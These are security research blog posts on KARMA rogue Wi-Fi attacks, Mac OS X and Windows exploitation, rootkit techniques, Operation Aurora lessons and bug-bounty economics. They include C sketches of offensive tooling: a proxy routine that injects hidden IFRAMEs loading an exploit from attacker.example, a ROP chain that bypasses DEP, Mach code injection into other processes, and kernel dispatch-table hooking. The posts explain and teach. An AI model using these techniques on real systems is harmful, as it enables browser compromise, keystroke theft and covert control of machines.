KARMA Demo on the CBS Early Show

Although I haven’t done any development on KARMA for a little over 5 years at this point, many of the weaknesses that it demonstrates are still very present, especially with the proliferation of open 802.11 Hotspots in public places. A few weeks ago, I was invited to help prepare a demo of KARMA for CBS News, and the segment aired not long after. If you’re like me and don’t have one of those old-fashioned tele-ma-vision boxes, you can check out the segment here.

Unfortunately, they weren’t able to use the full demo that I prepared. The full demo used a KARMA promiscuous access point to lure clients onto my rogue wireless network, where the rogue network’s gateway routed outbound HTTP traffic through a transparent proxy that injected IFRAMEs into each HTML page. The IFRAMEs loaded my own custom “Aurora” exploit, which injected Metasploit’s Meterpreter into the running web browser. From there, I could use the Meterpreter to sniff keystrokes as victims logged into their SSL-protected bank/e-mail/whatever. The point was that even if a victim only uses the open Wi-Fi network to log into the captive portal webpage, that’s enough for a nearby attacker to exploit their web browser and maintain control over their system going forward. Perhaps that was a little too complicated for a news segment that the average American watches over breakfast.
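
For the curious, the injection step itself is conceptually tiny. Here is a minimal sketch in C of the rewrite the proxy performed: splicing a hidden IFRAME in front of the closing </body> tag. The exploit URL is a placeholder, and a real transparent proxy would also have to fix up the Content-Length header:

    /* Minimal sketch of the proxy's rewrite step: splice a hidden IFRAME in
     * front of the closing </body> tag of an HTML response. The exploit URL
     * is a placeholder; a real transparent proxy must also fix up the
     * Content-Length header. */
    #include <string.h>

    #define INJECT "<iframe src=\"http://attacker.example/exploit.html\"" \
                   " width=\"0\" height=\"0\"></iframe>"

    /* Writes the rewritten page into out (of size outlen); 0 on success. */
    int inject_iframe(const char *html, char *out, size_t outlen) {
        const char *body_end = strstr(html, "</body>");
        if (body_end == NULL || strlen(html) + sizeof(INJECT) > outlen)
            return -1;
        size_t prefix = (size_t)(body_end - html);
        memcpy(out, html, prefix);                       /* up to </body>   */
        memcpy(out + prefix, INJECT, strlen(INJECT));    /* injected IFRAME */
        strcpy(out + prefix + strlen(INJECT), body_end); /* rest of page    */
        return 0;
    }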

As it has been quite a while since I have talked about KARMA, here are a few updates on the weaknesses that it demonstrated:

  • Windows XP SP2 systems with 802.11b-only wireless cards would “park” the cards by assigning them a random 32-character desired SSID when the user was not associated to a wireless network. Even if the user had no networks in their Preferred Networks List, the laptop would associate to a KARMA Promiscuous Access Point and activate the network stack while the GUI would still show the user as not currently associated to any network. This issue was an artifact of 802.11b-only card firmwares (PrismII and Orinoco were affected) and is not present on most 802.11g cards, which is what everyone has these days anyway.
  • Even with a newer card, Windows XP SP2 will broadcast the contents of its Preferred Networks List in Probe Request frames every 60 seconds until it joins a network. Revealing the contents of the PNL allows an attacker to create a network with that name or use a promiscuous access point to lure the client onto their rogue network (see the sniffing sketch after this list). Windows Vista and XP SP3 fixed this behavior.
  • Mac OS X had the same two behaviors, except that Apple’s AirPort driver would enable WEP on the wireless card when it had “parked” it. However, the WEP key was a static 40-bit key (0x0102030405 if I recall). Apple issued a security update in July 2005 and credited me for reporting the issue.
  • On 10/17/2006, Microsoft released a hotfix to fix both of the previous issues on Windows XP SP2 systems that Shane Macaulay and I had discovered and presented at various security conferences over the previous two years.
  • Newer versions of Windows (XP SP3, Vista, 7) are only affected if the user manually selects to join the rogue wireless network or the rogue network beacons an SSID in the user’s Preferred Networks List.
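
To make the Probe Request leak concrete, here is a minimal sketch of the listening side: capturing 802.11 Probe Request frames with libpcap and printing the SSIDs that clients reveal. It assumes a monitor-mode interface named mon0 with radiotap link-layer headers, and that the SSID element is the first tagged parameter (as it is in practice):

    /* Minimal sketch: print the SSIDs that clients leak in Probe Requests.
     * Assumes a monitor-mode interface ("mon0") with radiotap headers. */
    #include <pcap.h>
    #include <stdio.h>
    #include <stdint.h>

    static void handler(u_char *user, const struct pcap_pkthdr *h,
                        const u_char *pkt) {
        (void)user;
        if (h->caplen < 4) return;
        /* Radiotap: total header length is a little-endian u16 at offset 2. */
        uint16_t rt_len = pkt[2] | (pkt[3] << 8);
        if (h->caplen < (bpf_u_int32)rt_len + 24 + 2) return;
        const u_char *dot11 = pkt + rt_len;
        if (dot11[0] != 0x40) return;          /* type/subtype: Probe Request */
        const u_char *tags = dot11 + 24;       /* after the management header */
        const u_char *end = pkt + h->caplen;
        if (tags + 2 > end || tags[0] != 0)    /* tag 0 is the SSID element   */
            return;
        uint8_t len = tags[1];
        if (tags + 2 + len > end) return;
        printf("Probe Request for SSID: %.*s\n", (int)len,
               (const char *)(tags + 2));
    }

    int main(void) {
        char err[PCAP_ERRBUF_SIZE];
        pcap_t *p = pcap_open_live("mon0", 512, 1, 100, err);
        if (!p) { fprintf(stderr, "%s\n", err); return 1; }
        return pcap_loop(p, -1, handler, NULL);
    }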

Although the leading desktop operating systems found on most laptops have addressed the issue, most mobile phones now support 802.11 Wi-Fi, which may give KARMA a chance to live again!

BlackHat USA 2010

BlackHat is going to be a busy one for me this year because I am still trying to kick my nasty over-committing habit. Hopefully, though, that means there is something here that interests just about everybody.

If you love/hate Macs and like hacking, you should check out the Mac Hacking Class training that I am giving with Vincenzo Iozzo. We’ll be covering a lot of material including discovering and exploiting vulnerabilities, Mac OS X and Mach internals, and writing exploit payloads.

If Windows is more your style, you should check out my presentation, Return-Oriented Exploitation. I’ll be talking about using a variety of return-oriented techniques to bypass DEP/NX and ASLR on modern Windows operating systems, using my exploit for the “Operation Aurora” Internet Explorer vulnerability as an example and live demo. My presentation will be on Thursday at 1:45pm in the Exploitation Track (Augustus 1-2).

Finally, if you don’t really care about Macs or Windows, but do love security vulnerabilities and/or the infosec drama circus (b/c who really cares about the actual work we do?), you should check out the Pwnie Awards. For the 4th year in a row, Alex Sotirov and I have organized the Pwnie Awards to celebrate the achievements and failures of the information security industry. Along with our fellow esteemed judges (Dave Aitel, Mark Dowd, Halvar Flake, Dave Goldsmith, and HD Moore), we will be hosting the Pwnie Awards at 6:00pm on Wednesday, July 28th or July 29th (there seems to be some confusion on exactly which day it’ll be on and where currently). Follow the Pwnie Awards on Twitter for late-breaking updates.

Mac OS X Return-Oriented Exploitation

In The Mac Hacker’s Handbook and a few Mac-related presentations last year, I described my return-oriented exploitation technique for Mac OS X Leopard (10.5) on x86. This technique involved returning into the setjmp() function within dyld (the Mac OS X dynamic linker, which is loaded at a static location) to write out the values of controlled registers to a chosen location in writable and executable memory. By subsequently returning into that location, a few bytes of chosen x86 instructions could be executed. Performing this sequence twice allows the attacker to execute enough chosen instructions to copy their traditional machine code payload into executable memory and execute it. In Snow Leopard (10.6), Apple removed setjmp() from dyld, so I had to go back to the drawing board.
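
To see why setjmp() is such a convenient write primitive, here is a benign C sketch that dumps the register state setjmp() stores through its jmp_buf pointer argument; in the exploit, returning into setjmp() with a controlled argument turns this into a write of attacker-controlled register values to a chosen address:

    /* Benign illustration (not exploit code): setjmp() writes the current
     * register state through its jmp_buf pointer argument, so returning into
     * it with a controlled argument writes controlled register values to a
     * chosen address. */
    #include <setjmp.h>
    #include <stdio.h>

    int main(void) {
        jmp_buf env;                    /* the "chosen location" */
        if (setjmp(env) == 0) {         /* saves registers into env */
            const unsigned char *p = (const unsigned char *)env;
            for (size_t i = 0; i < sizeof(jmp_buf); i++)
                printf("%02x%c", p[i], (i + 1) % 16 ? ' ' : '\n');
            putchar('\n');
        }
        return 0;
    }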

For my talk at REcon this year, Mac OS X Return-Oriented Exploitation, I applied my recent research in return-oriented programming and exploitation to Mac OS X to develop a few techniques against Snow Leopard x86 (32-bit) processes. I also talk about why attackers don’t really have to care about 64-bit x86_64 processes on Snow Leopard just yet. If you missed REcon this year (and why would you ever allow that to happen?!), you can download my slides here: Mac OS X Return-Oriented Exploitation.

Hacking at Mach Speed!

The first ever NYC SummerCon last weekend was a blast and everyone seemed to have a great time. As promised, there was 0day at the conference, and hopefully no one remembered it because they were too drunk. Here are the slides for my presentation (they are really no substitute for the live SummerCon experience). This presentation was a mix of some technical background on local Mach RPC on Mac OS X, a bug I found the day before the conference, and some miscellaneous rants from my presentation at BSidesSF.
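
For some quick background on the Mach RPC side, here is a minimal sketch of the client’s first step in local Mach RPC: obtaining a send right to a named service from the bootstrap server, to which MIG-generated request messages can then be sent with mach_msg(). The service name below is just a well-known example:

    /* Minimal sketch of the first step of local Mach RPC: obtain a send
     * right to a named service from the bootstrap server. The service name
     * is just a well-known example. */
    #include <mach/mach.h>
    #include <servers/bootstrap.h>
    #include <stdio.h>

    int main(void) {
        mach_port_t port = MACH_PORT_NULL;
        kern_return_t kr = bootstrap_look_up(bootstrap_port,
                "com.apple.system.notification_center", &port);
        if (kr != KERN_SUCCESS) {
            fprintf(stderr, "bootstrap_look_up failed: 0x%x\n", kr);
            return 1;
        }
        /* MIG-generated RPC messages can now be sent to this port. */
        printf("got send right: 0x%x\n", port);
        return 0;
    }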

It was awesome bringing the conference up to NYC and I had a great time opening up for Dr. Raid’s “Busticating DEP” presentation/freestyle busticati rap.

Practical Return-Oriented Programming

At a number of conferences this spring, I am presenting “Practical Return-Oriented Programming.” The talk is about taking the academic research and applying it in the real world to develop exploits for Windows that bypass Permanent DEP using my BISC (Borrowed Instructions Synthetic Computer) library. In the talk, I demonstrate exploitation of the Internet Explorer “Operation Aurora” vulnerability on Windows 7. These techniques are not at all new, only my implementation is, and it owes much to previous research: Sebastian Krahmer’s “Borrowed Code Chunks” technique, Hovav Shacham’s return-oriented programming, and Pablo Sole’s DEPLIB.
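
For readers new to the technique, the classic shape of such a DEP bypass is a fake stack of return addresses that calls VirtualProtect() on the payload and then returns into it. Here is a hedged sketch with entirely hypothetical addresses; a real chain (such as one built with BISC) uses gadget addresses found in the target’s non-ASLR modules:

    /* Hedged sketch of a return-oriented DEP bypass: a fake stack of return
     * addresses that calls VirtualProtect() on the payload, then returns
     * into it. All addresses here are hypothetical placeholders. */
    #include <stdint.h>

    uint32_t rop_chain[] = {
        0x7c801ad4, /* hypothetical address of kernel32!VirtualProtect        */
        0x0c0c1000, /* "return address": the payload, executed after the call */
        0x0c0c1000, /* lpAddress:  page containing the payload                */
        0x00001000, /* dwSize:     one page                                   */
        0x00000040, /* flNewProtect: PAGE_EXECUTE_READWRITE                   */
        0x0c0c0000, /* lpflOldProtect: any writable scratch address           */
    };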

Assured Exploitation Training

This year, Alex Sotirov and I will be teaching our first “Assured Exploitation” training class at CanSecWest.  This training class is focused on various topics in advanced exploitation of memory corruption vulnerabilities.  This includes a thorough understanding of exploitation mitigations (where they are effective and where they aren’t), heap manipulation, return-oriented programming, and ensuring a clean continuation of process execution so that the application does not crash.

Over the course of the training, the hands-on exercises will take the students through the steps of fully understanding the “Aurora” Internet Explorer vulnerability and developing their own reliable and robust exploit for Internet Explorer 8 on Windows 7, just like the exploit demonstrated in my video demo.

One Exploit Should Not Ruin Your Day

Now that the media excitement in the aftermath of Operation Aurora has calmed down and we are all soothing ourselves to sleep by the sound of promptly applied Windows Updates, it is a good time to take a look back and try to figure out what the changing threat landscape means for real-world information security (besides Selling! More! Security! Products!) and what lessons can be learned from it.

First off, the threat landscape has not changed at all, only the perception of it.  If you have done or been around any high-level incident response, you know that these advanced persistent threats have been going on in various sectors for years.  Nor is it a new development that the attackers used an 0day client-side exploit along with targeted social engineering as their initial access vector.  What is brand new is that a number of large companies have voluntarily gone public with the fact that they were victims of a targeted attack.  And this is the most important lesson: targeted attacks do exist and happen to a number of industries besides the usual ones like credit card processors and e-commerce shops.

For the last decade of the information security industry, almost all of the products and solutions have been designed to stop casual opportunistic attackers and mass Internet-scale attacks.  Consequently, these products are absolutely worthless at protecting you from an Aurora-style attack.  Your software vendor doesn’t have a patch for the vulnerability; your anti-virus and/or network intrusion prevention systems don’t have signatures for the exploit or the agent it installs; and the 3rd-party software that your business needs to run prevents you from upgrading your desktops to the latest and greatest operating system and/or browser with the most complete exploit mitigations, due to a lack of compatibility.  How many of these large security product vendors employ even one full-time person to play the role of a dedicated attacker attempting to bypass or defeat their defensive systems?  Or have even hired one attack-oriented consultant on a contract for an independent assessment of the efficacy of their product or solution?  Don’t let the same product vendors who failed to protect the victims of Operation Aurora turn right around and sell you those same products as a solution to “the APT threat.”

Second, Operation Aurora has no bearing on the vulnerability disclosure debate.  This particular vulnerability was apparently reported to Microsoft in August and scheduled to be patched in February.  Some are arguing that had this vulnerability been reported via full-disclosure to everyone all at once, it would not have been used in these attacks.  They are right.  The reality, however, is that another vulnerability would have been used instead.  These attacks show that the vulnerability disclosure debate and the responsible disclosure process are simply a distraction that prevents us from actually improving security.  Remember, a vulnerability never owned anyone; an exploit did.  I am not arguing that vulnerabilities should not be fixed, simply that it is impossible to find and fix every security vulnerability, so we should not let that obsession monopolize our efforts and prevent us from implementing more secure application and network designs.

Finally, the larger problem is that it only took one exploit to compromise these organizations.  One exploit should never ruin your day.  Isn’t that why we build DMZ networks with firewalls in front of and behind them?  The point of doing that is to require more than one server-side exploit to get into your organization.  Thanks to rich Internet client applications, it now only requires one client-side exploit to get into your organization.  Ideally, it should require around three: a remote code execution exploit, a sandbox escape or integrity level escalation exploit, and finally a local privilege escalation exploit, in order to install and hide a remote access backdoor on the system.  Also, workstations that receive e-mail and instant messages from strangers, visit random web sites, and download/install whatever software from the Internet should probably not be on the same network as something like your lawful intercept system.

Take this time to review which exploit mitigations such as DEP and ASLR are enabled in your web browser based on your operating system, browser release, and web plugins.  Take ‘/NoExecute=AlwaysOn’ for a spin in your boot.ini and see what (if anything) breaks.  Use this opportunity to get buy-in for placing users’ Internet-enabled workstations onto DMZ-like subnets where you can closely monitor data going in and out.  Give developers remote desktop access to VMs on a separate development network for working on your products (they will be happy as long as you give the VMs more RAM than their workstations so their builds are quicker).  Give everyone access to an external Wi-Fi network to use with their personal Internet-enabled devices.  Get started implementing some internal network segmentation.  Never let a good crisis go to waste.
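
As a starting point for that review, on XP SP3, Vista, and later the system-wide DEP policy can also be queried programmatically rather than eyeballing boot.ini; a minimal sketch:

    /* Minimal sketch (Windows XP SP3 / Vista and later): query the
     * system-wide DEP policy programmatically. */
    #define _WIN32_WINNT 0x0600
    #include <windows.h>
    #include <stdio.h>

    int main(void) {
        /* Returns the policy set via /NoExecute in boot.ini (or bcdedit's
         * "nx" setting on Vista and later). */
        DEP_SYSTEM_POLICY_TYPE policy = GetSystemDEPPolicy();
        static const char *names[] = { "AlwaysOff", "AlwaysOn",
                                       "OptIn", "OptOut" };
        if (policy <= DEPPolicyOptOut)
            printf("System DEP policy: %s\n", names[policy]);
        return 0;
    }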

CSAW CTF 2009

Friday, November 13th, 2009 was the final round of the NYU-Poly CSAW Capture the Flag Application Security Challenge.   The challenge was open to teams of graduate and undergraduate students from around the world.  The preliminary round was performed over the Internet, giving teams 24 hours to complete a number of challenges in web application security, reverse engineering, and exploitation of memory corruption vulnerabilities.  Congratulations to all of the teams who played, those that made the finals, and especially to the winning teams: ppop, RPISEC, and SecDaemons.

I was responsible for creating and judging the exploitation challenges.  Because I love RISC CPU architectures, I made the challenges revolve around exploitation of embedded Linux systems on x86, PowerPC, ARM, and SH4 processors.  Stephen Ridley created a set of Windows binary reverse engineering challenges and an online scoreboard that was used for the preliminary rounds.  Here are the reversing and exploitation challenges for anyone who is interested in giving them a try for themselves:

  • My embedded Linux exploitation challenges (147 MB): BitTorrent
  • Stephen Ridley’s Windows binary reverse engineering challenges: GitHub

Advanced Mac OS X Rootkits

At BlackHat USA 2009, I presented “Advanced Mac OS X Rootkits” covering a number of Mach-based rootkit techniques and some tools that I have developed to demonstrate them.  While the majority of Mac OS X rootkits employ known and traditional Unix-based rootkit techniques, these Mach-based techniques show what else is possible using the powerful Mach abstractions in Mac OS X.  My presentation covered a number of Mach-based rootkit tools and techniques including user-mode Mach-O bundle injection, Mach RPC proxying, in-kernel RPC server injection/modification, and kernel rootkit detection.

User-mode DLL injection is quite common on Windows-based operating systems and is facilitated by the CreateRemoteThread API function.  The Mach thread and task calls also support creating threads in other tasks; however, they are much more low-level.  The inject-bundle tool demonstrates the steps necessary to use injected memory and threads to load a Mach-O bundle into another task.  A number of injectable bundles are included to demonstrate the API (test), capture an image using the iSight camera (iSight), log instant messages from within iChat (iChatSpy), and log SSL traffic sent through the Apple Secure Transport API (SSLSpy).
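
To give a flavor of just how low-level the Mach calls are compared to CreateRemoteThread, here is a condensed sketch of the core sequence behind inject-bundle-style injection (32-bit x86 era, most error handling omitted):

    /* Condensed sketch of the core Mach calls behind inject-bundle-style
     * injection (32-bit x86 era; most error handling omitted).
     * task_for_pid() requires appropriate privileges. */
    #include <sys/types.h>
    #include <mach/mach.h>
    #include <mach/mach_vm.h>
    #include <mach/mach_traps.h>

    kern_return_t inject_code(pid_t pid, const void *code, size_t len) {
        task_t task;
        kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
        if (kr != KERN_SUCCESS)
            return kr;
        /* Allocate memory in the remote task and copy the code into it. */
        mach_vm_address_t remote = 0;
        mach_vm_allocate(task, &remote, len, VM_FLAGS_ANYWHERE);
        mach_vm_write(task, remote, (vm_offset_t)code,
                      (mach_msg_type_number_t)len);
        mach_vm_protect(task, remote, len, FALSE,
                        VM_PROT_READ | VM_PROT_EXECUTE);
        /* Create a raw thread in the remote task, starting at the code.
         * NB: a real injector must also allocate a remote stack (and set
         * state.__esp) and bootstrap a proper pthread, as inject-bundle
         * does. */
        x86_thread_state32_t state = { 0 };
        state.__eip = (unsigned int)remote;
        thread_act_t thread;
        return thread_create_running(task, x86_THREAD_STATE32,
                                     (thread_state_t)&state,
                                     x86_THREAD_STATE32_COUNT, &thread);
    }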

The majority of Mach kernel services (task and thread system calls, for example) are implemented as RPC services.  The Mach message format was designed to be host-independent, which facilitates transferring them across the network.  Machiavelli demonstrates using Mach RPC proxying in order to transparently perform Mach RPC to a remote host. Machiavellian versions of ps and inject-bundle are included in order to demonstrate how this technique may be used for remote host control by rootkits.
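
The core of the proxying idea fits in a few lines; here is a hedged sketch that receives a message locally and relays its raw bytes to a remote peer, which would re-inject it with mach_msg(). Port-right translation and the reply path, which Machiavelli must handle, are elided:

    /* Hedged sketch of the proxying idea: receive a Mach message locally
     * and relay its raw bytes to a remote peer over a socket; the peer
     * re-injects it with mach_msg(). Port-right translation and the reply
     * path are elided. */
    #include <mach/mach.h>
    #include <unistd.h>

    void proxy_one_message(mach_port_t local_port, int relay_fd) {
        union {
            mach_msg_header_t hdr;
            char buf[4096];
        } msg;
        /* Receive the next message sent to the local service port. */
        if (mach_msg(&msg.hdr, MACH_RCV_MSG, 0, sizeof(msg), local_port,
                     MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL) != KERN_SUCCESS)
            return;
        /* The message format is largely host-independent, so the raw bytes
         * can be shipped across the network. */
        write(relay_fd, msg.buf, msg.hdr.msgh_size);
    }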

Most of the public kernel rootkits for Mac OS X load as kernel extensions and remove their entries from the kernel’s kmod list in order to hide themselves from kextstat and prevent themselves from being unloaded. The uncloak tool examines the kernel memory regions looking for loaded Mach-O objects.  If any of these objects do not correspond to a known kernel extension, they may be dumped to disk using kernel-macho-dump.
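
The detection heuristic itself is straightforward: given a copy of a kernel memory region, scan word-aligned offsets for Mach-O headers. A minimal sketch (region enumeration and comparison against the kmod list are elided):

    /* Minimal sketch of uncloak's core heuristic: scan a copy of a kernel
     * memory region for 32-bit Mach-O headers (MH_MAGIC is 0xfeedface).
     * Enumerating regions and comparing hits against the kmod list are
     * elided. */
    #include <stdint.h>
    #include <stddef.h>
    #include <mach-o/loader.h>

    /* Returns the offset of the first Mach-O header found, or -1. */
    long find_macho(const uint8_t *mem, size_t len) {
        for (size_t off = 0;
             off + sizeof(struct mach_header) <= len; off += 4) {
            const struct mach_header *mh =
                (const struct mach_header *)(mem + off);
            if (mh->magic == MH_MAGIC)
                return (long)off;
        }
        return -1;
    }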

Mach IPC messages to the in-kernel Mach RPC servers are dispatched through the mig_buckets table.  This table stores function pointers to the kernel RPC server routines and is analogous to the Unix sysent system call table.  A kernel rootkit may directly modify this table in order to inject new kernel RPC servers or interpose on in-kernel RPC server routines.  The KRPC kernel extension demonstrates dynamically injecting a new in-kernel RPC subsystem in this fashion.
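
Conceptually, the interposition is an ordinary function-pointer swap; the sketch below uses a simplified stand-in for the kernel’s mig_buckets entries (the real layout lives in the xnu sources), so treat the struct as illustrative rather than the actual kernel definition:

    /* Illustrative sketch of the interposition idea: swap a routine pointer
     * in a dispatch table. The struct is a simplified stand-in for the
     * kernel's mig_buckets entries, not the actual kernel definition. */
    #include <stddef.h>

    typedef struct {
        int num;                                   /* MIG routine number */
        void (*routine)(void *request, void *reply);
    } mig_entry_t;

    static void (*orig_routine)(void *, void *);

    static void hooked_routine(void *request, void *reply) {
        /* ...inspect or modify the request here... */
        orig_routine(request, reply);              /* pass through       */
    }

    void interpose(mig_entry_t *table, size_t nentries, int target_num) {
        for (size_t i = 0; i < nentries; i++) {
            if (table[i].num == target_num) {
                orig_routine = table[i].routine;   /* save original      */
                table[i].routine = hooked_routine; /* install hook       */
                return;
            }
        }
    }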

These tools are deliberately released as ‘non-hostile’ proof-of-concept tools that are meant to demonstrate techniques and are not suitable for use in actual rootkits or attack tools.  The IM and SSL logging bundles log to the local system’s disk in an obvious fashion, and Machiavelli opens up the controlling host to some obvious attacks.  The non-Machiavelli version of inject-bundle, however, is fully functional and useful for a variety of system-level tasks.  Using the other tools outside of a closed network or test virtual machine is not recommended.

Here are the goods:

No More Free Bugs

Alex and I holding "No More Free Bugs" sign during Charlie's Lightning Talk at CanSecWest

A few weeks ago, Charlie Miller, Alex Sotirov, and I arrived at a new meme: No More Free Bugs.  We started talking about it publicly at CanSecWest, where Charlie notably announced it in his Lightning Talk and in his ZDNet interview.  It is now making its way through Twitter and the rest of the tubes.  It is understandable that this may be a controversial position, so I’m going to give some more background on the argument here.

First, this is not advocating non-disclosure, nor any particular disclosure policy at all.  That decision is left to the discoverer of the vulnerability.  I’m not even going to touch the anti/partial/full disclosure argument.

Second, this philosophy primarily concerns vulnerabilities in products sold for profit by for-profit companies, especially those that already employ security engineers as employees or consultants.  Vulnerabilities discovered in open source projects or Internet infrastructure deservedly require different handling.

The basic argument is as follows:

  • Vulnerabilities place users and customers at risk.  Otherwise, vendors wouldn’t bother to fix them.  Internet malware and worms spread via security vulnerabilities and place home users’ and enterprises’ sensitive data at risk.
  • Vulnerabilities have legitimate value.  Software vendors pay their own employees and consultants to find and fix vulnerabilities in their products during development.  Third-party companies such as Verisign (iDefense) and ZDI will pay researchers for exclusive rights to a vulnerability so that they may responsibly disclose it to the vendor while also sharing advance information about it with their customers (Verisign/iDefense) or building detection for it into their product (ZDI).  Google is even offering a cash bounty for the best security vulnerability in Native Client.  Donald Knuth personally pays for bugs found in his software, and Dan Bernstein personally paid a $1000 bounty for a vulnerability in djbdns.
  • Reporting vulnerabilities can be legally and professionally risky.  When a researcher discloses a vulnerability to the vendor, there is no “whistleblower” protection, and independent security researchers may be unable to legally defend themselves.  You may get threatened, sued, or even thrown in jail.  A number of security researchers have had their employers pressured by vendors to whom they were responsibly disclosing security vulnerabilities.  Vendors expect security researchers to follow responsible disclosure guidelines when they volunteer vulnerabilities, but they are under no such pressure to act responsibly in return towards security researchers.  Where are the vendors’ security research amnesty agreements?
  • It is unfair to paying customers.  Professional bug hunting is a specialized and expensive business.  Software vendors that “freeload” on the security research community place their customers at risk by not putting forth resources to discover vulnerabilities in and fix their products.

Therefore, reporting vulnerabilities for free without any legal agreements in place is risky volunteer work.  There are a number of legitimate alternatives to the risky proposition of volunteering free vulnerabilities and I have already mentioned a few (I don’t want to turn this into an advertisement or discussion on the best/proper way to monetize security research).   There just need to be more legal and transparent options for monetizing security research.  This would provide a fair market value for a researcher’s findings and incentivize more researchers to find and report vulnerabilities to these organizations.  All of this would help make security research a more widespread and legitimate profession.  In the meantime, I’m not complaining about its current cachet and allure.
